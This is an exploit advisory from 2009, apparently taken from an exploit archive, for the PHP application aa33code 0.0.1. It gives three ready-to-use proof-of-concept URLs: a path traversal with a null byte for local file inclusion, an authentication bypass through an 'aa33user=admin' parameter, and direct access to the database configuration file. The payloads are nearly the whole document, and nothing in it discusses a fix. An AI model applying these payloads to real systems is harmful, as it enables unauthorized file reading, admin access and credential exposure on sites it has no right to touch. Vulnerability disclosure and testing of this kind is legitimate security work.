id: 5590
date: 07/31/2009
title: aa33code 0.0.1 (LFI/Auth Bypass/DCD) Multiple Remote Vulnerabilites
author: SirGod
cves: 

===================================================================
aa33code 0.0.1 (LFI/Auth Bypass/DCD) Multiple Remote Vulnerabilites
===================================================================


##############################################################################################################
[+] aa33code 0.0.1 (LFI/Auth Bypass/DCD) Multiple Remote Vulnerabilites
[+] Discovered By SirGod
##############################################################################################################

[+] Download : http://sourceforge.net/projects/aa33code/files/aa33code/0.0.1/aa33code-0.0.1.tar.gz/download

[+] Local File Inclusion

 - PoC

     http://127.0.0.1/[path]/reviews.php?artid=../../../../../../boot.ini%00

[+] Authentication Bypass

 - PoC

     http://127.0.0.1/[path]/artedit/main.php?aa33user=admin

[+] Database Configuration Disclosure

 - PoC

     http://127.0.0.1/[path]/inc/mysql.inc


##############################################################################################################



#  0day.today [2023-03-26]  #